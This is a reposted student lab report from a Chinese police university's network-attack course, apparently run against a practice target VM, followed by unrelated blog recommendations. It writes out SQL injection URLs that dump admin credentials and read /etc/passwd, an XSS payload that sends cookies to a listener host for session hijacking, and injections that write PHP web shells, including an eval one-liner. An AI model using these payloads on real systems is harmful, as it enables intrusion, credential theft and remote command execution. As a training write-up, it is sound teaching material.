实验报告五

最新推荐文章于 2022-10-12 20:57:41 发布
最新推荐文章于 2022-10-12 20:57:41 发布
阅读量146 收藏 1
点赞数
文章标签: php 运维 数据库
原文链接:http://www.cnblogs.com/p201521430047/p/8944406.html
版权

 

 

 

 

 

 

中国人民公安大学

Chinese people public security university

 

网络对抗技术

实验报告

 

实验五

                   web攻击靶机解题过程

 

 

 

学生姓名

栗克宇 

年级

15 

区队

 三

指导教师

 

            高见

首先搭建虚拟机,扫描下当前网段 发现一个192.168.188.131的IP地址

 

 

打开该虚拟机提供的网页 使用发现可能存在sql注入点

http://192.168.188.131/cat.php?id=1

 

 

 

 

使用联合查询 查看网页的显示位

 http://192.168.188.131/cat.php?id=-2%20union%20select%201,2,3,4

 

 

 

 发现2是回显位,发现数据库的名字为photoblog

 

 http://192.168.188.131/cat.php?id=-2%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27

顺势查到数据库中的表,可见users表对我们有用

 

 

继续查询users表中列名,有变量名 id,login,password

http://192.168.188.131/cat.php?id=-2%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27

http://192.168.188.131/cat.php?id=-1%20union%20select%201,group_concat(id,0x23,login,0x23,password),3,4%20from%20users

 查看users表中的数据   

1#admin#8efe310f9ab3efeae8d410a8e0166eb2

 

 

MD5解密后,得到密码P4ssw0rd

 

 

 

 

在192.168.31.148机器上打开网页:

 

 

是个博客系统。

每个博客标题下面可以评价:

 

测试下是否存在xss漏洞。

发现提交后有弹出框:

进一步构造内容

<script>document.write('<img src="http://192.168.179.142/?'+document.cookie+'  "/>');</script>
同时在192.168.179.142机器上用nc打开80端口。

在原来机器上登陆admin账户,密码是p4ssw0rd

登陆进去后查看刚才发布的评论话题。

接着在142这台机器查看nc的返回内容。

获取到cookie信息。

复制下cookie,在142机器上打开评论所在的网页。并修改cookie的值为刚才复制的值。

刷新下页面,发现已经已admin的身份登录进页面中

进入管理界面后,发现博客编辑界面存在sql注入漏洞。

 

http://192.168.179.133/admin/edit.php ?id=4 union select 1,2,3,4

发现2和3可以显示出来

http://192.168.179.133/admin/edit.php ?id=0 union select 1,2,load_file("/etc/passwd"),4

可以读取passwd文件,但是不能读取shadow文件

在编辑页面发现错误提示中有/var/www/classes 目录,

 在查看源码时发现有css目录

 

尝试后发现/var/www/css 目录可写。

于是构造语句:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然后打开

http://192.168.179.130/css/s.php

显示:

说明s.php文件成功写入到/var/www/css 目录,下面将

<?php system($_GET['c']); ?>

写入z.php中,构造url为:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

访问z.php,并使用uname -a获取系统信息。可以远程执行命令。

 

 

下面写入一句话木马,构造url:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

菜刀链接:

 

转载于:https://www.cnblogs.com/p201521430047/p/8944406.html

weixin_30387423
关注
实验报告信号的采样与恢复
11-25
实验报告信号的采样与恢复 本实验报告主要讨论了信号采样和恢复的原理和过程,并通过实验验证了抽样定理。在实验中,我们使用了信号与系统实验箱、系统时域与频域分析模块和双踪示波器等设备,观察了抽样脉冲、...
基于语音信号的说话人识别实验报告
最新发布
Happyday763的博客
01-17 863
备注:该部分就是您要录制的语音样本(0-9的数字录音)该例程中用了20个.wav格式的录音:0a.wav,1a.wav....,9a.wav,0b.wav,1b.wav......,9b.wav,分别保存了0到9的发音前10个用于参考训练,后10个作为测试。2、 语音信息变化很大。语音模型不仅对不同的讲话者是不同的,而且对于同一个讲话者也是不同的。这一工作要解决的问题首先是因为连续语音中的因素、音节或单词之间的调音结合引起的音变,使基本模型的边界变的不明确.其次要建立一个理解语法和语义的规则的专家系统。
实验
weixin_30768661的博客
05-02 109
一、SQL注入 首先搭建虚拟机 用kali扫描下当前网段 发现一个192.168.1.134的可疑ip地址 使用nmap扫描端口 发现该ip开启了ftp和http两个服务 打开该虚拟机提供的网页 发现网站使用url传参 可能存在sql注入点 在id=1后加一个引号,网页报错 该网站存在sql注入漏洞 使用order by语句试出网站后台数据库表的列数 当order b...
知识图谱课程报告-关系抽取文献综述
程哥哥的一亩三分地
05-19 2997
关系抽取文献综述 引言: ​ 随着大数据的不断发展,在海量的结构化数据或非结构化数据中更低成本的抽取出有价值的信息越来越重要,可以说信息抽取是自然语言处理领域的一项最基本任务,信息抽取进而可被分成三个子任务:实体抽取(entity extraction)、关系抽取(relation extraction)和事件抽取(event extraction),而关系抽取搭建起知识图谱研究的基石。本文先介绍了关系抽取的定义和研究意义,而后指出了关系抽取目前存在的一些挑战,并介绍了关系抽取评测所使用到的几个主流测试数
知识图谱构建实验笔记(二):知识图谱搭建过程与总结
submarineas的博客
03-19 4056
文章目录引言命名实体识别1. 数据预处理2. 构建模型并预测3. 总结关系抽取1. 数据预处理2. 模型构建并预测3. 总结数据入库load csv方式neo4j-admin import方式与Cypher用法GitHub项目实验参考与推荐 引言 本篇记上篇原理后对整个构建知识图谱的过程进行一个比较系统的实践过程。同样,实验代码记录自实验楼的射雕英雄传,根据个人习惯与理解程度,进行了重新排版与修改,实验过程与结果在个人腾讯云上完成。 命名实体识别 1. 数据预处理 原始文本和标签分别定义为: raw_tex
知识图谱(含代码)
qq_51465378的博客
05-11 5407
中山大学计算机学院 人工智能 本科生实验报告 一、实验题目 编写程序,实现FOIL(First Order Inductive Learner)算法,对如下给定的知识图谱和目标谓词进行规则学习,并得到新的以目标谓词为关系的事实(用一阶逻辑表示)。 (1)、给定的知识图谱所有三元组的一阶逻辑如下(测例1):
大学计算机实验报告.pdf
07-14
在大学计算机实验报告中,学生们深入探讨了操作系统中的进程同步和死锁问题,以及Windows系统中的进程管理和虚拟机参数。以下是对这些知识点的详细解释: 1. **进程同步**: - 进程同步是多道程序设计中确保多个...
Verilog流水灯实验报告
05-09
Verilog流水灯实验报告 Verilog是一种基于事件驱动的硬件描述语言,广泛应用于数字电路设计和验证。流水灯实验是Verilog的经典实验之一,本实验报告将详细介绍流水灯实验的设计思路、设计框图、实验步骤和实验结果...
实验 存储器实验报告+答案
12-08
实验报告将详细介绍存储器的结构、与CPU的连接方式、存储器的字位扩展方法,并通过logisim软件模拟实现存储器的扩展。 首先,存储器的结构包括多种类型,如随机存取存储器(RAM)、只读存储器(ROM)、闪存等。在...
LoadRunner测试实验报告.docx
04-19
实验报告将深入探讨如何使用LoadRunner进行性能测试,包括实验的目的、内容、要求,以及LoadRunner的基本操作流程。 一、实验目的 1. 掌握LoadRunner的基本操作,包括脚本录制、编辑和执行。 2. 熟练运用性能...
AICon2018-《知识图谱技术实践》-邵蓥侠-合集
05-30
自己亲自从网站上下载过来的,原版pdf文档,对于了解知识图谱及其关键技术有很大帮助,分不高,希望大家相互广播
深度学习+知识图谱实验手册 实验1-波士顿房价预测: 1、定义问题:波士顿房价预估项目的需求 项目需求:波士顿房地产市场竞争激烈
04-25
深度学习+知识图谱实验手册 实验1-波士顿房价预测: 1、定义问题:波士顿房价预估项目的需求 项目需求:波士顿房地产市场竞争激烈,而你想成为该地区最好的房地产经纪人。为了更好地与同行竞争,你决定运用机器学习的一些基本概念,帮助客户为自己的房产定下最佳售价。你的任务是用可用的工具进行统计分析,并基于分析建立优化模型。这个模型将用来为你的客户评估房产的最佳售价。 通过项目需求,我们可以抽象出以下项目需求: •该问题是一个回归问题:需要拟合历史数据,得到一个连续的预测值; •需要统计出一段时间内波士顿房价历史数据 •需要找到影响波士顿房价的各个因素 核心代码: 1.from sklearn.linear_model import LinearRegression, SGDRegressor, Ridge, LogisticRegression   2.from sklearn.datasets import load_boston   3.from sklearn.model_selection import train_test_split   4.from sklearn.preproc
说话人语音识别
08-10
采集作者的声音信号为基本的原始信号。对语音信号进行频域分析后,进行加随机噪声处理并进行相关分析,设计滤波器并运用所设计的滤波器对价噪声信号进行滤波,绘制滤波后的时域波形和频谱。
知识图谱构建实验笔记(一):环境搭建与试验原理介绍
submarineas的博客
03-19 2892
引言 最近刚在实验楼做了这个关于知识图谱的课程,想总结点什么,也勾起了我的一点回忆,因为最早我写博客就是为了记录一些我对web与nlp还有爬虫的笔记,博客标签上就是标的这些。结果最后发现这三者我都没有在继续做下去了,而是工作于视频图像,有够戏剧化的,所以这里,想找回一点当年那种感觉。 知识图谱架构 根据一文揭秘!自底向上构建知识图谱全过程,构建知识图谱一般分为3个部分,分别为: 信息抽取:从各种类型的数据源中提取出实体、属性以及实体间的相互关系,在此基础上形成本体化的知识表达; 知识融合:在获得新知
【Vulnhub靶场】通过sql注入漏洞,文件上传漏洞拿下网站webshell
weixin_45619494的博客
10-12 717
00 页面没变化?发现上传的路径没法知道,用7kbscan扫描,发现http://192.168.93.132/admin/uploads,进入。点击test,发现多了个图片,上面url变成http://192.168.93.132/cat.php?返回首页,检查源代码,发现图片的变化是通过id的变化来改变的。
知识图谱
红豆的博客
05-31 510
引言
知识图谱总结(二)实践篇
weixin_39989705的博客
04-17 1045
(一):数据准备和本体建模 1.配置环境(本机为Windows10) (1)MYSQL数据库 (2)Nacivat数据库可视化工具 (3)从GITHUB上下载相关数据 https://github.com/SimmerChan/KG-demo-for-movie 其中包含电影数据的sql文件等文件 (4)protege软件 2.内容 数据是与电影相关的,基本统计数据如下:演员数量:505人,电影数...
知识图谱笔记(小象学院课程)
小小顺利的博客
10-21 2130
2018年寒假看小象学院课程的时候写的笔记,一共写了10页,记得比较乱。因为纸质笔记不容易保存,所以把它扫成了PDF以备后用。希望大家能够指出不足和错误。 ...
实验报告201521460014 综合渗透
weixin_33906657的博客
10-23 467
学号 中国人民公安大学 Chinese people’public security university 网络对抗技术 实验报告 实验 综合渗透 学生姓名 张旺尧 年级 2015 区队 6 ...
"Unix/Linux实验报告:Linux C语言编程实验
实验报告详细介绍了本次实验的内容和目标,包括实验时间、实验任务和实验指导。在这个实验中,学生需要在Linux操作系统下进行C语言编程,通过实际操作加深对Linux操作系统和C语言的理解。这个实验涉及到了Linux操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值